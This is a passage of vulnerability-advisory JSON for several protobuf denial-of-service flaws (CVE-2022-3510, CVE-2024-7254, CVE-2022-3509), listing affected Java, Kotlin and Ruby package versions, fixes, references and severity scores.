"https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/12/GHSA-4gg5-vx3j-xwc7/GHSA-4gg5-vx3j-xwc7.json" } }, { "package": { "name": "com.google.protobuf:protobuf-java", "ecosystem": "Maven", "purl": "pkg:maven/com.google.protobuf/protobuf-java" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "3.21.0" }, { "fixed": "3.21.7" } ] } ], "versions": [ "3.21.0", "3.21.1", "3.21.2", "3.21.3", "3.21.4", "3.21.5", "3.21.6" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/12/GHSA-4gg5-vx3j-xwc7/GHSA-4gg5-vx3j-xwc7.json" } }, { "package": { "name": "com.google.protobuf:protobuf-javalite", "ecosystem": "Maven", "purl": "pkg:maven/com.google.protobuf/protobuf-javalite" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "3.0.0" }, { "fixed": "3.16.3" } ] } ], "versions": [ "3.10.0", "3.10.0-rc-1", "3.11.0", "3.11.0-rc-1", "3.11.0-rc-2", "3.11.1", "3.11.3", "3.11.4", "3.12.0", "3.12.0-rc-1", "3.12.0-rc-2", "3.12.1", "3.12.2", "3.12.4", "3.13.0", "3.13.0-rc-3", "3.14.0", "3.14.0-rc-1", "3.14.0-rc-2", "3.14.0-rc-3", "3.15.0", "3.15.0-rc-1", "3.15.0-rc-2", "3.15.1", "3.15.2", "3.15.3", "3.15.4", "3.15.5", "3.15.6", "3.15.7", "3.15.8", "3.16.0", "3.16.0-rc-1", "3.16.0-rc-2", "3.16.1", "3.8.0", "3.8.0-rc-1", "3.9.0", "3.9.0-rc-1", "3.9.1", "3.9.2" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/12/GHSA-4gg5-vx3j-xwc7/GHSA-4gg5-vx3j-xwc7.json" } }, { "package": { "name": "com.google.protobuf:protobuf-javalite", "ecosystem": "Maven", "purl": "pkg:maven/com.google.protobuf/protobuf-javalite" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "3.17.0" }, { "fixed": "3.19.6" } ] } ], "versions": [ "3.17.0", "3.17.1", "3.17.2", "3.17.3", "3.18.0", "3.18.0-rc-1", "3.18.0-rc-2", "3.18.1", "3.18.2", "3.18.3", "3.19.0", "3.19.0-rc-1", "3.19.0-rc-2", "3.19.1", "3.19.2", "3.19.3", "3.19.4", "3.19.5" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/12/GHSA-4gg5-vx3j-xwc7/GHSA-4gg5-vx3j-xwc7.json" } }, { "package": { "name": "com.google.protobuf:protobuf-javalite", "ecosystem": "Maven", "purl": "pkg:maven/com.google.protobuf/protobuf-javalite" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "3.20.0" }, { "fixed": "3.20.3" } ] } ], "versions": [ "3.20.0", "3.20.1", "3.20.1-rc-1", "3.20.2" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/12/GHSA-4gg5-vx3j-xwc7/GHSA-4gg5-vx3j-xwc7.json" } }, { "package": { "name": "com.google.protobuf:protobuf-javalite", "ecosystem": "Maven", "purl": "pkg:maven/com.google.protobuf/protobuf-javalite" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "3.21.0" }, { "fixed": "3.21.7" } ] } ], "versions": [ "3.21.0", "3.21.1", "3.21.2", "3.21.3", "3.21.4", "3.21.5", "3.21.6" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/12/GHSA-4gg5-vx3j-xwc7/GHSA-4gg5-vx3j-xwc7.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-3510" }, { "type": "WEB", "url": "https://github.com/protocolbuffers/protobuf/commit/db7c17803320525722f45c1d26fc08bc41d1bf48" }, { "type": "PACKAGE", "url": "https://github.com/protocolbuffers/protobuf/tree/main/java" } ], "database_specific": { "cwe_ids": [ "CWE-400" ], "github_reviewed": true, "github_reviewed_at": "2022-12-12T22:34:26Z", "nvd_published_at": "2022-12-12T13:15:00Z", "severity": "HIGH" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" } ] }, { "schema_version": "1.7.3", "id": "GHSA-735f-pc8j-v9w8", "published": "2024-09-19T16:06:03Z", "modified": "2025-09-10T21:15:49.364660Z", "aliases": [ "CVE-2024-7254" ], "related": [ "CGA-2232-8fcm-46m9", "CGA-26vm-c4xx-fw99", "CGA-3jqr-m622-9v65", "CGA-3rgp-cw6g-rj22", "CGA-5j9v-w79r-r73h", "CGA-6xwj-3x88-p9hm", "CGA-8cc7-m97x-rcw7", "CGA-9p42-9pfp-83g9", "CGA-c87c-r7j2-6c2f", "CGA-f6ww-g9c8-j27r", "CGA-gf8j-3f7c-2f6p", "CGA-grm4-x73v-9xcw", "CGA-h5p9-89pr-8jw6", "CGA-h63q-9rr4-x7xq", "CGA-m76c-26vf-3vhr", "CGA-pj84-6mcw-q95g", "CGA-r5c2-7p3p-gp53", "CGA-rjwj-h86r-xhrh", "CGA-v28j-qmhq-qrxf", "CGA-v5fx-59qm-4247", "CGA-xrwq-83cw-2mjc", "RUSTSEC-2024-0437" ], "summary": "protobuf-java has potential Denial of Service issue", "details": "### Summary\nWhen parsing unknown fields in the Protobuf Java Lite and Full library, a maliciously crafted message can cause a StackOverflow error and lead to a program crash.\n\nReporter: Alexis Challande, Trail of Bits Ecosystem Security Team \u003cecosystem@trailofbits.com\u003e\n\nAffected versions: This issue affects all versions of both the Java full and lite Protobuf runtimes, as well as Protobuf for Kotlin and JRuby, which themselves use the Java Protobuf runtime.\n\n### Severity\n[CVE-2024-7254](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-7254) **High** CVSS4.0 Score 8.7 (NOTE: there may be a delay in publication)\nThis is a potential Denial of Service. Parsing nested groups as unknown fields with DiscardUnknownFieldsParser or Java Protobuf Lite parser, or against Protobuf map fields, creates unbounded recursions that can be abused by an attacker.\n\n### Proof of Concept\nFor reproduction details, please refer to the unit tests (Protobuf Java [LiteTest](https://github.com/protocolbuffers/protobuf/blob/a037f28ff81ee45ebe008c64ab632bf5372242ce/java/lite/src/test/java/com/google/protobuf/LiteTest.java) and [CodedInputStreamTest](https://github.com/protocolbuffers/protobuf/blob/a037f28ff81ee45ebe008c64ab632bf5372242ce/java/core/src/test/java/com/google/protobuf/CodedInputStreamTest.java)) that identify the specific inputs that exercise this parsing weakness.\n\n### Remediation and Mitigation\nWe have been working diligently to address this issue and have released a mitigation that is available now. Please update to the latest available versions of the following packages:\n* protobuf-java (3.25.5, 4.27.5, 4.28.2)\n* protobuf-javalite (3.25.5, 4.27.5, 4.28.2)\n* protobuf-kotlin (3.25.5, 4.27.5, 4.28.2)\n* protobuf-kotlin-lite (3.25.5, 4.27.5, 4.28.2)\n* com-protobuf [JRuby gem only] (3.25.5, 4.27.5, 4.28.2)", "affected": [ { "package": { "name": "com.google.protobuf:protobuf-java", "ecosystem": "Maven", "purl": "pkg:maven/com.google.protobuf/protobuf-java" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "3.25.5" } ] } ], "versions": [ "2.0.1", "2.0.3", "2.1.0", "2.2.0", "2.3.0", "2.4.0a", "2.4.1", "2.5.0", "2.6.0", "2.6.1", "3.0.0", "3.0.0-alpha-2", "3.0.0-alpha-3", "3.0.0-alpha-3.1", "3.0.0-beta-1", "3.0.0-beta-2", "3.0.0-beta-3", "3.0.0-beta-4", "3.0.2", "3.1.0", "3.10.0", "3.10.0-rc-1", "3.11.0", "3.11.0-rc-1", "3.11.0-rc-2", "3.11.1", "3.11.3", "3.11.4", "3.12.0", "3.12.0-rc-1", "3.12.0-rc-2", "3.12.1", "3.12.2", "3.12.4", "3.13.0", "3.13.0-rc-3", "3.14.0", "3.14.0-rc-1", "3.14.0-rc-2", "3.14.0-rc-3", "3.15.0", "3.15.0-rc-1", "3.15.0-rc-2", "3.15.1", "3.15.2", "3.15.3", "3.15.4", "3.15.5", "3.15.6", "3.15.7", "3.15.8", "3.16.0", "3.16.0-rc-1", "3.16.0-rc-2", "3.16.1", "3.16.3", "3.17.0", "3.17.0-rc-1", "3.17.0-rc-2", "3.17.1", "3.17.2", "3.17.3", "3.18.0", "3.18.0-rc-1", "3.18.0-rc-2", "3.18.1", "3.18.2", "3.18.3", "3.19.0", "3.19.0-rc-1", "3.19.0-rc-2", "3.19.1", "3.19.2", "3.19.3", "3.19.4", "3.19.5", "3.19.6", "3.2.0", "3.2.0-rc.1", "3.2.0rc2", "3.20.0", "3.20.0-rc-1", "3.20.1", "3.20.1-rc-1", "3.20.2", "3.20.3", "3.21.0", "3.21.0-rc-1", "3.21.0-rc-2", "3.21.1", "3.21.10", "3.21.11", "3.21.12", "3.21.2", "3.21.3", "3.21.4", "3.21.5", "3.21.6", "3.21.7", "3.21.8", "3.21.9", "3.22.0", "3.22.0-RC1", "3.22.0-RC3", "3.22.1", "3.22.2", "3.22.3", "3.22.4", "3.22.5", "3.23.0", "3.23.0-RC2", "3.23.0-RC3", "3.23.1", "3.23.2", "3.23.3", "3.23.4", "3.24.0", "3.24.0-RC1", "3.24.0-RC2", "3.24.0-RC3", "3.24.1", "3.24.2", "3.24.3", "3.24.4", "3.25.0", "3.25.0-RC1", "3.25.0-RC2", "3.25.1", "3.25.2", "3.25.3", "3.25.4", "3.3.0", "3.3.1", "3.4.0", "3.5.0", "3.5.1", "3.6.0", "3.6.1", "3.7.0", "3.7.0-rc1", "3.7.1", "3.8.0", "3.8.0-rc-1", "3.9.0", "3.9.0-rc-1", "3.9.1", "3.9.2" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2024/09/GHSA-735f-pc8j-v9w8/GHSA-735f-pc8j-v9w8.json" } }, { "package": { "name": "com.google.protobuf:protobuf-javalite", "ecosystem": "Maven", "purl": "pkg:maven/com.google.protobuf/protobuf-javalite" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "3.25.5" } ] } ], "versions": [ "3.10.0", "3.10.0-rc-1", "3.11.0", "3.11.0-rc-1", "3.11.0-rc-2", "3.11.1", "3.11.3", "3.11.4", "3.12.0", "3.12.0-rc-1", "3.12.0-rc-2", "3.12.1", "3.12.2", "3.12.4", "3.13.0", "3.13.0-rc-3", "3.14.0", "3.14.0-rc-1", "3.14.0-rc-2", "3.14.0-rc-3", "3.15.0", "3.15.0-rc-1", "3.15.0-rc-2", "3.15.1", "3.15.2", "3.15.3", "3.15.4", "3.15.5", "3.15.6", "3.15.7", "3.15.8", "3.16.0", "3.16.0-rc-1", "3.16.0-rc-2", "3.16.1", "3.16.3", "3.17.0", "3.17.0-rc-1", "3.17.0-rc-2", "3.17.1", "3.17.2", "3.17.3", "3.18.0", "3.18.0-rc-1", "3.18.0-rc-2", "3.18.1", "3.18.2", "3.18.3", "3.19.0", "3.19.0-rc-1", "3.19.0-rc-2", "3.19.1", "3.19.2", "3.19.3", "3.19.4", "3.19.5", "3.19.6", "3.20.0", "3.20.0-rc-1", "3.20.1", "3.20.1-rc-1", "3.20.2", "3.20.3", "3.21.0", "3.21.0-rc-1", "3.21.0-rc-2", "3.21.1", "3.21.10", "3.21.11", "3.21.12", "3.21.2", "3.21.3", "3.21.4", "3.21.5", "3.21.6", "3.21.7", "3.21.8", "3.21.9", "3.22.0", "3.22.0-RC1", "3.22.0-RC3", "3.22.1", "3.22.2", "3.22.3", "3.22.4", "3.22.5", "3.23.0", "3.23.0-RC2", "3.23.0-RC3", "3.23.1", "3.23.2", "3.23.3", "3.23.4", "3.24.0", "3.24.0-RC1", "3.24.0-RC2", "3.24.0-RC3", "3.24.1", "3.24.2", "3.24.3", "3.24.4", "3.25.0", "3.25.0-RC1", "3.25.0-RC2", "3.25.1", "3.25.2", "3.25.3", "3.25.4", "3.8.0", "3.8.0-rc-1", "3.9.0", "3.9.0-rc-1", "3.9.1", "3.9.2" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2024/09/GHSA-735f-pc8j-v9w8/GHSA-735f-pc8j-v9w8.json" } }, { "package": { "name": "com.google.protobuf:protobuf-kotlin", "ecosystem": "Maven", "purl": "pkg:maven/com.google.protobuf/protobuf-kotlin" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "3.25.5" } ] } ], "versions": [ "3.17.0", "3.17.0-rc-2", "3.17.1", "3.17.2", "3.17.3", "3.18.0", "3.18.0-rc-1", "3.18.0-rc-2", "3.18.1", "3.18.2", "3.18.3", "3.19.0", "3.19.0-rc-1", "3.19.0-rc-2", "3.19.1", "3.19.2", "3.19.3", "3.19.4", "3.19.5", "3.19.6", "3.20.0", "3.20.0-rc-1", "3.20.1", "3.20.1-rc-1", "3.20.2", "3.20.3", "3.21.0", "3.21.0-rc-1", "3.21.0-rc-2", "3.21.1", "3.21.10", "3.21.11", "3.21.12", "3.21.2", "3.21.3", "3.21.4", "3.21.5", "3.21.6", "3.21.7", "3.21.8", "3.21.9", "3.22.0", "3.22.0-RC1", "3.22.0-RC3", "3.22.1", "3.22.2", "3.22.3", "3.22.4", "3.22.5", "3.23.0", "3.23.0-RC2", "3.23.0-RC3", "3.23.1", "3.23.2", "3.23.3", "3.23.4", "3.24.0", "3.24.0-RC1", "3.24.0-RC2", "3.24.0-RC3", "3.24.1", "3.24.2", "3.24.3", "3.24.4", "3.25.0", "3.25.0-RC1", "3.25.0-RC2", "3.25.1", "3.25.2", "3.25.3", "3.25.4" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2024/09/GHSA-735f-pc8j-v9w8/GHSA-735f-pc8j-v9w8.json" } }, { "package": { "name": "com.google.protobuf:protobuf-kotlin-lite", "ecosystem": "Maven", "purl": "pkg:maven/com.google.protobuf/protobuf-kotlin-lite" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "3.25.5" } ] } ], "versions": [ "3.17.0", "3.17.0-rc-2", "3.17.1", "3.17.2", "3.17.3", "3.18.0", "3.18.0-rc-1", "3.18.0-rc-2", "3.18.1", "3.18.2", "3.18.3", "3.19.0", "3.19.0-rc-1", "3.19.0-rc-2", "3.19.1", "3.19.2", "3.19.3", "3.19.4", "3.19.5", "3.19.6", "3.20.0", "3.20.0-rc-1", "3.20.1", "3.20.1-rc-1", "3.20.2", "3.20.3", "3.21.0", "3.21.0-rc-1", "3.21.0-rc-2", "3.21.1", "3.21.10", "3.21.11", "3.21.12", "3.21.2", "3.21.3", "3.21.4", "3.21.5", "3.21.6", "3.21.7", "3.21.8", "3.21.9", "3.22.0", "3.22.0-RC1", "3.22.0-RC3", "3.22.1", "3.22.2", "3.22.3", "3.22.4", "3.22.5", "3.23.0", "3.23.0-RC2", "3.23.0-RC3", "3.23.1", "3.23.2", "3.23.3", "3.23.4", "3.24.0", "3.24.0-RC1", "3.24.0-RC2", "3.24.0-RC3", "3.24.1", "3.24.2", "3.24.3", "3.24.4", "3.25.0", "3.25.0-RC1", "3.25.0-RC2", "3.25.1", "3.25.2", "3.25.3", "3.25.4" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2024/09/GHSA-735f-pc8j-v9w8/GHSA-735f-pc8j-v9w8.json" } }, { "package": { "name": "google-protobuf", "ecosystem": "RubyGems", "purl": "pkg:gem/google-protobuf" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "3.25.5" } ] } ], "versions": [ "3.0.0", "3.0.0.alpha.1.0", "3.0.0.alpha.1.1", "3.0.0.alpha.2.0", "3.0.0.alpha.3", "3.0.0.alpha.3.1.pre", "3.0.0.alpha.4.0", "3.0.0.alpha.5.0.3", "3.0.0.alpha.5.0.4", "3.0.0.alpha.5.0.5", "3.0.0.alpha.5.0.5.1", "3.0.2", "3.1.0", "3.1.0.0.pre", "3.10.0.rc.1", "3.10.1", "3.11.0", "3.11.0.rc.1", "3.11.0.rc.2", "3.11.1", "3.11.2", "3.11.3", "3.11.4", "3.12.0", "3.12.0.rc.1", "3.12.0.rc.2", "3.12.1", "3.12.2", "3.12.4", "3.13.0", "3.13.0.rc.3", "3.14.0", "3.14.0.rc.1", "3.14.0.rc.2", "3.14.0.rc.3", "3.15.0", "3.15.0.rc.1", "3.15.0.rc.2", "3.15.1", "3.15.2", "3.15.3", "3.15.4", "3.15.5", "3.15.6", "3.15.7", "3.15.8", "3.16.0", "3.16.0.rc.1", "3.16.0.rc.2", "3.17.0", "3.17.0.rc.1", "3.17.0.rc.2", "3.17.1", "3.17.2", "3.17.3", "3.18.0", "3.18.0.rc.1", "3.18.0.rc.2", "3.18.1", "3.18.2", "3.18.3", "3.19.0", "3.19.0.rc.1", "3.19.0.rc.2", "3.19.1", "3.19.2", "3.19.3", "3.19.4", "3.19.5", "3.19.6", "3.2.0", "3.2.0.1", "3.2.0.2", "3.2.1.pre", "3.20.0", "3.20.0.rc.1", "3.20.0.rc.2", "3.20.1", "3.20.1.rc.1", "3.20.2", "3.20.3", "3.21.0", "3.21.0.rc.1", "3.21.0.rc.2", "3.21.1", "3.21.10", "3.21.11", "3.21.12", "3.21.2", "3.21.3", "3.21.4", "3.21.5", "3.21.6", "3.21.7", "3.21.8", "3.21.9", "3.22.0", "3.22.0.rc.2", "3.22.0.rc.3", "3.22.1", "3.22.2", "3.22.3", "3.22.5", "3.23.0", "3.23.0.rc.1", "3.23.0.rc.2", "3.23.0.rc.3", "3.23.1", "3.23.2", "3.23.3", "3.23.4", "3.24.0", "3.24.0.rc.2", "3.24.0.rc.3", "3.24.1", "3.24.2", "3.24.3", "3.24.4", "3.25.0", "3.25.0.rc.1", "3.25.0.rc.2", "3.25.1", "3.25.2", "3.25.3", "3.25.4", "3.3.0", "3.4.0.1", "3.4.0.2", "3.4.1.1", "3.5.0", "3.5.0.pre", "3.5.1", "3.5.1.1", "3.5.1.2", "3.6.0", "3.6.1", "3.7.0", "3.7.0.rc.2", "3.7.0.rc.3", "3.7.1", "3.8.0", "3.8.0.rc.1", "3.9.0", "3.9.0.rc.1", "3.9.1", "3.9.2" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2024/09/GHSA-735f-pc8j-v9w8/GHSA-735f-pc8j-v9w8.json" } }, { "package": { "name": "google-protobuf", "ecosystem": "RubyGems", "purl": "pkg:gem/google-protobuf" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "4.0.0.rc.1" }, { "fixed": "4.27.5" } ] } ], "versions": [ "4.26.0", "4.26.0.rc.1", "4.26.0.rc.2", "4.26.0.rc.3", "4.26.1", "4.27.0", "4.27.0.rc.1", "4.27.0.rc.2", "4.27.0.rc.3", "4.27.1", "4.27.2", "4.27.3", "4.27.4" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2024/09/GHSA-735f-pc8j-v9w8/GHSA-735f-pc8j-v9w8.json" } }, { "package": { "name": "google-protobuf", "ecosystem": "RubyGems", "purl": "pkg:gem/google-protobuf" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "4.28.0.rc.1" }, { "fixed": "4.28.2" } ] } ], "versions": [ "4.28.0", "4.28.0.rc.1", "4.28.0.rc.2", "4.28.0.rc.3", "4.28.1" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2024/09/GHSA-735f-pc8j-v9w8/GHSA-735f-pc8j-v9w8.json" } }, { "package": { "name": "com.google.protobuf:protobuf-kotlin-lite", "ecosystem": "Maven", "purl": "pkg:maven/com.google.protobuf/protobuf-kotlin-lite" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "4.0.0-RC1" }, { "fixed": "4.27.5" } ] } ], "versions": [ "4.26.0", "4.26.0-RC1", "4.26.0-RC2", "4.26.0-RC3", "4.26.1", "4.27.0", "4.27.0-RC1", "4.27.0-RC2", "4.27.0-RC3", "4.27.1", "4.27.2", "4.27.3", "4.27.4" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2024/09/GHSA-735f-pc8j-v9w8/GHSA-735f-pc8j-v9w8.json" } }, { "package": { "name": "com.google.protobuf:protobuf-kotlin-lite", "ecosystem": "Maven", "purl": "pkg:maven/com.google.protobuf/protobuf-kotlin-lite" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "4.28.0-RC1" }, { "fixed": "4.28.2" } ] } ], "versions": [ "4.28.0", "4.28.0-RC1", "4.28.0-RC2", "4.28.0-RC3", "4.28.1" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2024/09/GHSA-735f-pc8j-v9w8/GHSA-735f-pc8j-v9w8.json" } }, { "package": { "name": "com.google.protobuf:protobuf-kotlin", "ecosystem": "Maven", "purl": "pkg:maven/com.google.protobuf/protobuf-kotlin" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "4.0.0-RC1" }, { "fixed": "4.27.5" } ] } ], "versions": [ "4.26.0", "4.26.0-RC1", "4.26.0-RC2", "4.26.0-RC3", "4.26.1", "4.27.0", "4.27.0-RC1", "4.27.0-RC2", "4.27.0-RC3", "4.27.1", "4.27.2", "4.27.3", "4.27.4" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2024/09/GHSA-735f-pc8j-v9w8/GHSA-735f-pc8j-v9w8.json" } }, { "package": { "name": "com.google.protobuf:protobuf-kotlin", "ecosystem": "Maven", "purl": "pkg:maven/com.google.protobuf/protobuf-kotlin" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "4.28.0-RC1" }, { "fixed": "4.28.2" } ] } ], "versions": [ "4.28.0", "4.28.0-RC1", "4.28.0-RC2", "4.28.0-RC3", "4.28.1" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2024/09/GHSA-735f-pc8j-v9w8/GHSA-735f-pc8j-v9w8.json" } }, { "package": { "name": "com.google.protobuf:protobuf-javalite", "ecosystem": "Maven", "purl": "pkg:maven/com.google.protobuf/protobuf-javalite" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "4.0.0-RC1" }, { "fixed": "4.27.5" } ] } ], "versions": [ "4.0.0-rc-1", "4.0.0-rc-2", "4.26.0", "4.26.0-RC1", "4.26.0-RC2", "4.26.0-RC3", "4.26.1", "4.27.0", "4.27.0-RC1", "4.27.0-RC2", "4.27.0-RC3", "4.27.1", "4.27.2", "4.27.3", "4.27.4" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2024/09/GHSA-735f-pc8j-v9w8/GHSA-735f-pc8j-v9w8.json" } }, { "package": { "name": "com.google.protobuf:protobuf-javalite", "ecosystem": "Maven", "purl": "pkg:maven/com.google.protobuf/protobuf-javalite" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "4.28.0-RC1" }, { "fixed": "4.28.2" } ] } ], "versions": [ "4.28.0", "4.28.0-RC1", "4.28.0-RC2", "4.28.0-RC3", "4.28.1" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2024/09/GHSA-735f-pc8j-v9w8/GHSA-735f-pc8j-v9w8.json" } }, { "package": { "name": "com.google.protobuf:protobuf-java", "ecosystem": "Maven", "purl": "pkg:maven/com.google.protobuf/protobuf-java" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "4.0.0-RC1" }, { "fixed": "4.27.5" } ] } ], "versions": [ "4.0.0-rc-1", "4.0.0-rc-2", "4.26.0", "4.26.0-RC1", "4.26.0-RC2", "4.26.0-RC3", "4.26.1", "4.27.0", "4.27.0-RC1", "4.27.0-RC2", "4.27.0-RC3", "4.27.1", "4.27.2", "4.27.3", "4.27.4" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2024/09/GHSA-735f-pc8j-v9w8/GHSA-735f-pc8j-v9w8.json" } }, { "package": { "name": "com.google.protobuf:protobuf-java", "ecosystem": "Maven", "purl": "pkg:maven/com.google.protobuf/protobuf-java" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "4.28.0-RC1" }, { "fixed": "4.28.2" } ] } ], "versions": [ "4.28.0", "4.28.0-RC1", "4.28.0-RC2", "4.28.0-RC3", "4.28.1" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2024/09/GHSA-735f-pc8j-v9w8/GHSA-735f-pc8j-v9w8.json" } } ], "references": [ { "type": "WEB", "url": "https://github.com/protocolbuffers/protobuf/security/advisories/GHSA-735f-pc8j-v9w8" }, { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-7254" }, { "type": "WEB", "url": "https://github.com/protocolbuffers/protobuf/commit/4728531c162f2f9e8c2ca1add713cfee2db6be3b" }, { "type": "WEB", "url": "https://github.com/protocolbuffers/protobuf/commit/850fcce9176e2c9070614dab53537760498c926b" }, { "type": "WEB", "url": "https://github.com/protocolbuffers/protobuf/commit/9a5f5fe752a20cbac2e722b06949ac985abdd534" }, { "type": "WEB", "url": "https://github.com/protocolbuffers/protobuf/commit/ac9fb5b4c71b0dd80985b27684e265d1f03abf46" }, { "type": "WEB", "url": "https://github.com/protocolbuffers/protobuf/commit/cc8b3483a5584b3301e3d43d17eb59704857ffaa" }, { "type": "WEB", "url": "https://github.com/protocolbuffers/protobuf/commit/d6c82fc55a76481c676f541a255571e8950bb8c3" }, { "type": "PACKAGE", "url": "https://github.com/protocolbuffers/protobuf" }, { "type": "WEB", "url": "https://github.com/rubysec/ruby-advisory-db/blob/master/gems/google-protobuf/CVE-2024-7254.yml" }, { "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20241213-0010" }, { "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20250418-0006" } ], "database_specific": { "cwe_ids": [ "CWE-20", "CWE-400", "CWE-787" ], "github_reviewed": true, "github_reviewed_at": "2024-09-19T16:06:03Z", "nvd_published_at": "2024-09-19T01:15:10Z", "severity": "HIGH" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" }, { "type": "CVSS_V4", "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N" } ] }, { "schema_version": "1.7.3", "id": "GHSA-g5ww-5jh7-63cx", "published": "2022-12-12T15:30:33Z", "modified": "2025-09-02T20:13:15.173427Z", "aliases": [ "CGA-m9x3-8pwv-rjh3", "CVE-2022-3509" ], "related": [ "CGA-43ph-pj7p-v2hh", "CGA-77gj-vphq-h4fj", "CGA-mr3q-c88f-3c44" ], "summary": "Protobuf Java vulnerable to Uncontrolled Resource Consumption", "details": "A parsing issue similar to CVE-2022-3171, but with textformat in protobuf-java core and lite versions prior to 3.21.7, 3.20.3, 3.19.6 and 3.16.3 can lead to a denial of service attack. Inputs containing multiple instances of non-repeated embedded messages with repeated or unknown fields causes objects to be converted back-n-forth between mutable and immutable forms, resulting in potentially long garbage collection pauses. We recommend updating to the versions mentioned above.", "affected": [ { "package": { "name": "com.google.protobuf:protobuf-java", "ecosystem": "Maven", "purl": "pkg:maven/com.google.protobuf/protobuf-java" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "3.0.0" }, { "fixed": "3.16.3" } ] } ], "versions": [ "3.0.0", "3.0.2", "3.1.0", "3.10.0", "3.10.0-rc-1", "3.11.0", "3.11.0-rc-1", "3.11.0-rc-2", "3.11.1", "3.11.3", "3.11.4", "3.12.0", "3.12.0-rc-1", "3.12.0-rc-2", "3.12.1", "3.12.2", "3.12.4", "3.13.0", "3.13.0-rc-3", "3.14.0", "3.14.0-rc-1", "3.14.0-rc-2", "3.14.0-rc-3", "3.15.0", "3.15.0-rc-1", "3.15.0-rc-2", "3.15.1", "3.15.2", "3.15.3", "3.15.4", "3.15.5", "3.15.6", "3.15.7", "3.15.8", "3.16.0", "3.16.0-rc-1", "3.16.0-rc-2", "3.16.1", "3.2.0", "3.2.0-rc.1", "3.2.0rc2", "3.3.0", "3.3.1", "3.4.0", "3.5.0", "3.5.1", "3.6.0", "3.6.1", "3.7.0", "3.7.0-rc1", "3.7.1", "3.8.0", "3.8.0-rc-1", "3.9.0", "3.9.0-rc-1", "3.9.1", "3.9.2" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/12/GHSA-g5ww-5jh7-63cx/GHSA-g5ww-5jh7-63cx.json" } }, { "package": { "name": "com.google.protobuf:protobuf-java", "ecosystem": "Maven", "purl": "pkg:maven/com.google.protobuf/protobuf-java" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "3.17.0" }, { "fixed": "3.19.6" } ] } ], "versions": [ "3.17.0", "3.17.1", "3.17.2", "3.17.3", "3.18.0", "3.18.0-rc-1", "3.18.0-rc-2", "3.18.1", "3.18.2", "3.18.3", "3.19.0", "3.19.0-rc-1", "3.19.0-rc-2", "3.19.1", "3.19.2", "3.19.3", "3.19.4", "3.19.5" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/12/GHSA-g5ww-5jh7-63cx/GHSA-g5ww-5jh7-63cx.json" } }, { "package": { "name": "com.google.protobuf:protobuf-java", "ecosystem": "Maven", "purl": 